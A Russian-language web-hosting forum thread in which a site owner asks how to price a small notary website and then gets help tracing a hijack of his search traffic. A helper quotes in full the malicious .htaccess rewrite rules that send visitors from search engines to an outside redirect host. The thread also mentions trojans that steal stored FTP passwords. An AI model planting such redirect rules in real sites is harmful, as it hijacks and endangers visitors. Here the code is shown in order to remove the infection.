EOMY.NET
Хостинг EOMY.NET: Форум поддержки

FAQFAQ   ПоискПоиск   ПользователиПользователи   ГруппыГруппы   РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 
RSS Feed  

Вопрос по продаже сайта
На страницу 1, 2  След.

Начать новую тему   Ответить на тему    Список форумов EOMY.NET -> Заработок на сайте
Вопрос по продаже сайта
Автор Сообщение
SergejFedosov
11 1110 1000
11 1110 1000

4057 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 09:59    Заголовок сообщения: Вопрос по продаже сайта Ответить с цитатой

Осенью знакомый попросил сделать небольшой сайт для своего знакомого - частного нотариуса. Сделал, зарегистрировал для него домен в зоне org.ua, а заказчик исчез. Я сайт повесил у себя на хостинге (есть не просит) и забыл про него. По соц.закладкам прогнал, всё.

За прошедшее время Гугль дал главной странице троечку, а Яндекс (и русский, и украинский) - первое место по запросу "частный нотариус Донецк". Вот думаю, может продать сайт другому частному нотариусу в нашем городе. Опыта подобных продаж у меня нет совсем, сколько реально просить за "визитку" из 50-ти страниц с первым местом в Я. по такому запросу?
Веденин
Красные глаза
Красные глаза

11926 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 10:24    Заголовок сообщения: Ответить с цитатой

Посмотрел нет такого сайта в первой десятки яндекса по запросу, какой адрес сайта?
Вообще цена определяется исключительно кол-вом денег заказчика и желаний заработать создателю, реально выйти на первое место по локальному региональному запросу (запрос город) в поисковике не сложно, реально работы на 500 - 1000 руб., вопрос насколько это знает покупатель, я бы начал предлагать с 300-400$, но хорошой ценой было бы и 150 - 200$ Very Happy все зависит от кол-ва денег покупателя и умения убедить, что этот сайт это все, что им нужно для того чтобы грести деньги лопатой Very Happy

P.S. Кстати статистика Яндекса частный нотариус в Донецке спрашивали 16 раз в месяц, т.е. выйти в топ можно простым размещением этой фразы в title, H1 и на страницах сайта, так что это не очень дорогое продвижение. Laughing

Да и вообще "частный нотариус" сам по себе редкий запрос
Цитата:
Что искали со словом «частный нотариус» — 221 показов в месяц.

Другой вопрос покупатели слабо знают SEO и не умеют пользоватся статистикой Яндекса Laughing так что тут все зависит от умения бить себя в грудь и божится, что два месяца ночами не спал, а продвигал сайт, отбиваясь от наездов конкурентов Laughing и каждый день сотни человек ищут частного нотариуса в Донецке через Инет Laughing

Тематические поисковые системы Рунета: Танцевальная, программиста, поиск книг
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
SergejFedosov
11 1110 1000
11 1110 1000

4057 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 11:25    Заголовок сообщения: Ответить с цитатой

***Посмотрел нет такого сайта в первой десятки яндекса по запросу, какой адрес сайта?***

Гм... проверил сейчас, запрос "частный нотариус Донецк" - 2-е место, запрос "нотариус частный Донецк" - первое. Урл: http://www.privnotar.org.ua

Возможно на выдачу влияет и география запрашиваемого?

***Вообще цена определяется исключительно кол-вом денег заказчика и желаний заработать создателю...***

Я понимаю, что согласие есть продукт при полном непротивлении сторон Very Happy , но всё-таки хотелось бы знать, от чего отталкиваться. Визитка, если не ошибаюсь, стоит ок. сотни баксов. За эти деньги я по нотариусам шляться не буду. Несолидно, да и бензина больше потрачу. А баксов за триста сходил бы. Но дает ли такое увеличение цены указанная выдача? Сомневаюсь.

Только что обнаружил странную и неприятную проблему. Набираю в браузере www.privnotar.org.ua - открывается мой сайт, перехожу по ссылке с Яндекса - открывается какая-то дурь. Что делать?!
Веденин
Красные глаза
Красные глаза

11926 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 11:39    Заголовок сообщения: Ответить с цитатой

SergejFedosov писал(а):
***Посмотрел нет такого сайта в первой десятки яндекса по запросу, какой адрес сайта?***

Гм... проверил сейчас, запрос "частный нотариус Донецк" - 2-е место, запрос "нотариус частный Донецк" - первое. Урл: http://www.privnotar.org.ua

Возможно на выдачу влияет и география запрашиваемого?

Возможно у меня этот сайт на пятом месте

SergejFedosov писал(а):

***Вообще цена определяется исключительно кол-вом денег заказчика и желаний заработать создателю...***

Я понимаю, что согласие есть продукт при полном непротивлении сторон Very Happy , но всё-таки хотелось бы знать, от чего отталкиваться. Визитка, если не ошибаюсь, стоит ок. сотни баксов. За эти деньги я по нотариусам шляться не буду. Несолидно, да и бензина больше потрачу. А баксов за триста сходил бы. Но дает ли такое увеличение цены указанная выдача? Сомневаюсь.

А зачем шляться напишите письмо (электронное) захотят ответят?
Ну и прости 300$, захочет кто-то купить это уже вопрос другой вам это никто не скажет, Я бы не заплатил, но мало ли кто бывает.

SergejFedosov писал(а):

Только что обнаружил странную и неприятную проблему. Набираю в браузере www.privnotar.org.ua - открывается мой сайт, перехожу по ссылке с Яндекса - открывается какая-то дурь. Что делать?!

Ну javascript у вас на страницы нет, сайт сделан на html, значит причина только одна - htaccess. Какой-то вирус перехватил ваш ftp доступ и поменял файл, исправьте его и проверти комп на вирусы.

SergejFedosov писал(а):

Но дает ли такое увеличение цены указанная выдача? Сомневаюсь.

Все зависит как её продавать.

Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
SergejFedosov
11 1110 1000
11 1110 1000

4057 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 12:09    Заголовок сообщения: Ответить с цитатой

***Ну javascript у вас на страницы нет, сайт сделан на html, значит причина только одна - htaccess. Какой-то вирус перехватил ваш ftp доступ и поменял файл, исправьте его и проверти комп на вирусы.***

Проверил .htaccess сразу же (была подобная шняга на другом сайте) - все нормально. Одна строка: AddHandler application/x-httpd-php5 .html .htm , чтобы php скрипты в html файлах выполнялись. Скроптов, кроме сэйповского, на странице нет, проверил. Сэйповский скрипт тоже перезалил.

Если бы это был .htaccess - почему он не срабатывает, когда просто набираешь адрес сайта в браузере?

***А зачем шляться напишите письмо (электронное) захотят ответят?***

У тех нотариусов, у кого есть email (далеко не у всех он есть!), чаше всего сайты-визитки в Сети уже есть. То есть для продажи придется поработать ножками.

***Все зависит как её продавать.***

Несомненно, но агент "совместной украино-канадско-израильской фирмы" из меня аховый. Уговаривать покупать я не люблю, не хочу и не буду. По основному заработку тоже приходится заниматься продажами - в этом деле я минималист. Есть такой-то товар, желаете - покупайте. Даже если человек тянется за деньгами, советую: скачайте сначала из Сети пробную версию, поработайте, посмотрите. Потом покупайте.

И не торгуюсь, не умею. Поэтому и интересуюсь ценой. Чтобы больше не запросить. Бо уступать тоже не буду.

***Да и вообще "частный нотариус" сам по себе редкий запрос
Quote: Что искали со словом «частный нотариус» — 221 показов в месяц.***

А где Вы это смотрите? У меня Яндекс выдает только такое: "Запросов за месяц: частный — 128 498, нотариус — 154 902".

Возможно это тоже зависит от региона. В России частных нотариусов нет, там все просто нотариусы. А на Украине они делятся на частных и государственных.

Кстати, по запросу "частный нотариус" (именно так, с кавычками) мой сайт в Яндексе на 4-ом месте.
Веденин
Красные глаза
Красные глаза

11926 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 12:25    Заголовок сообщения: Ответить с цитатой

SergejFedosov писал(а):
***Ну javascript у вас на страницы нет, сайт сделан на html, значит причина только одна - htaccess. Какой-то вирус перехватил ваш ftp доступ и поменял файл, исправьте его и проверти комп на вирусы.***

Проверил .htaccess сразу же (была подобная шняга на другом сайте) - все нормально. Одна строка: AddHandler application/x-httpd-php5 .html .htm , чтобы php скрипты в html файлах выполнялись. Скроптов, кроме сэйповского, на странице нет, проверил. Сэйповский скрипт тоже перезалил.

Если бы это был .htaccess - почему он не срабатывает, когда просто набираешь адрес сайта в браузере?

Потому что можно поставить переадресацию в зависимости от параметра reference, у меня именно так и было, когда трафик с поисковиков уходил на лево, правда я заметил за пару дней резкое падение посещаемости.
Вы точно смотрели во всех директориях наличие htaccess?
Если не htaccess, то как вариант, что к кому то файлу прикручен php скрипт (поищите тег <? по всем файлам), либо хостер не добросовестный (взломанный), больше вариантов не вижу проблема явно на вашей стороне.

SergejFedosov писал(а):

И не торгуюсь, не умею. Поэтому и интересуюсь ценой. Чтобы больше не запросить. Бо уступать тоже не буду.

Цена сайту примерно 100 - 150$,ИМХО за 300$ продать наверно можно, но шансы где то в районе 20-25% и то придется обойти (обзвонить) приличное кол-во нотариусов.

SergejFedosov писал(а):

***Да и вообще "частный нотариус" сам по себе редкий запрос
Quote: Что искали со словом «частный нотариус» — 221 показов в месяц.***

А где Вы это смотрите? У меня Яндекс выдает только такое: "Запросов за месяц: частный — 128 498, нотариус — 154 902".

http://wordstat.yandex.ru/advq?rpt=ppc&key=&shw=1&tm=&checkboxes=&text=%F7%E0%F1%F2%ED%FB%E9+%ED%EE%F2%E0%F0%E8%F3%F1+&regions_text=%C2%F1%E5&regions=

SergejFedosov
11 1110 1000
11 1110 1000

4057 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 12:58    Заголовок сообщения: Ответить с цитатой

***Вы точно смотрели во всех директориях наличие htaccess?***

Там 3 директории cgi-bin (пустая), files (с картинками), сэйповская. Больше нет. Сайт размещен в отдельной директории на аккаунте FSAY, домен прикручен как дополнительный. .htaccess в корневой папке аккаунта тоже проверил.

***Если не htaccess, то как вариант, что к кому то файлу прикручен php скрипт*** Для подмены он может быть прикручен только к index.htm, не так ли? Ведь никакие другие файлы по переходу с яндекса не загружаются. Файл проверил.

Попробовал с Яндекса переходить на другие страницы сайта. Результат тотже - перебрасывает на порнухку и др. гнусности.

Вячеслав, у Вас сайт тоже не FSAY? Не могли бы Вы попробовать перейте по ссылке Яндекса на свой сайт. Всё ли в порядке?
Веденин
Красные глаза
Красные глаза

11926 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 13:04    Заголовок сообщения: Ответить с цитатой

SergejFedosov писал(а):

***Если не htaccess, то как вариант, что к кому то файлу прикручен php скрипт*** Для подмены он может быть прикручен только к index.htm, не так ли? Ведь никакие другие файлы по переходу с яндекса не загружаются. Файл проверил.

Может к скрипту сапы подцепился? Может попробовать убрать саповский скрипт?

SergejFedosov писал(а):

Вячеслав, у Вас сайт тоже не FSAY? Не могли бы Вы попробовать перейте по ссылке Яндекса на свой сайт. Всё ли в порядке?

Вы хотели сказать на FSAY? Проверил все нормально.

P.S. Если хотите дайте в личку пароль к доп. домену я могу попробовать поискать вирус Confused

SergejFedosov
11 1110 1000
11 1110 1000

4057 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 13:20    Заголовок сообщения: Ответить с цитатой

***Может к скрипту сапы подцепился? Может попробовать убрать саповский скрипт?***

Удалял. все равно на порнушку переправляет.

***Если хотите дайте в личку пароль***

Сейчас отправлю.
Веденин
Красные глаза
Красные глаза

11926 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 13:33    Заголовок сообщения: Ответить с цитатой

SergejFedosov писал(а):
***Может к скрипту сапы подцепился? Может попробовать убрать саповский скрипт?***

Удалял. все равно на порнушку переправляет.

***Если хотите дайте в личку пароль***

Сейчас отправлю.

В самом главном .htaccess (который лежит сразу при соединении до public_html) код

Код:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://j-5.info/2/go.php?sid=2 [R,L]

Как я и говорил, т.е. ВСЕ ваши сайты ЗАРАЖЕНЫ!

SergejFedosov
11 1110 1000
11 1110 1000

4057 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 13:38    Заголовок сообщения: Ответить с цитатой

Спасибо, Вячеслав. Я не догадался, что .htaccess может лежать до public_html. Наука будет.

Удалил файл, перенаправление исчезло.
Веденин
Красные глаза
Красные глаза

11926 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 13:48    Заголовок сообщения: Ответить с цитатой

SergejFedosov писал(а):
Спасибо, Вячеслав. Я не догадался, что .htaccess может лежать до public_html. Наука будет.

Удалил файл, перенаправление исчезло.

Да не за что.
На j-5.info можно написать абузу, чтобы не баловались Wink

P.S. Сообщение с паролем удалил, мало ли что, но вам все равно стоит поменять пароль, а то один раз я не поменял пароль так троян постоянно восстанавливался после удаления, до тех пор пока пароль все таки не сменил.

SergejFedosov
11 1110 1000
11 1110 1000

4057 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 16:30    Заголовок сообщения: Ответить с цитатой

***вам все равно стоит поменять пароль***

У меня в прошлом месяце был завал с вирусами на всех сайтах. Не только перенаправление по .htaccess , но и скрипты на страницах и нулевые ifame там-же. Все почистил, пароли поменял. А вверх public_html заглянуть не догадался.

На другом форуме дали дельный совет. Может еще кому пригодится:

"...пара звонков по студиям вашего города по поводу изготовления сайта и пара звонков по выводу его в топ-1 и будете примерно ориентироваться в ценах. Просто выступите псевдо-заказчиком.

Далее снижаете цену на удобный вам % и предлагаете клиентам."
Johnny
Два пингвина
Два пингвина

1051 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 16:31    Заголовок сообщения: Ответить с цитатой

Веденин
а как в папку до public_html мог попасть этот файл? Взломали доступ по FTP?
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
SergejFedosov
11 1110 1000
11 1110 1000

4057 Монеты

СообщениеДобавлено: Пт, 20 Фев, 2009 16:35    Заголовок сообщения: Ответить с цитатой

***Взломали доступ по FTP?***

Для закачки файлов я пользовался Total Commander. Он все логины и пароли хранит в файле wcx_ftp.ini в директории WINDOWS. Написать троян для скачки именно этого файла несложно. И такие вирусы уже есть.
Начать новую тему   Ответить на тему    Список форумов EOMY.NET -> Заработок на сайте Часовой пояс: GMT
На страницу 1, 2  След.
Страница 1 из 2

Rambler's Top100   Рейтинг@Mail.ru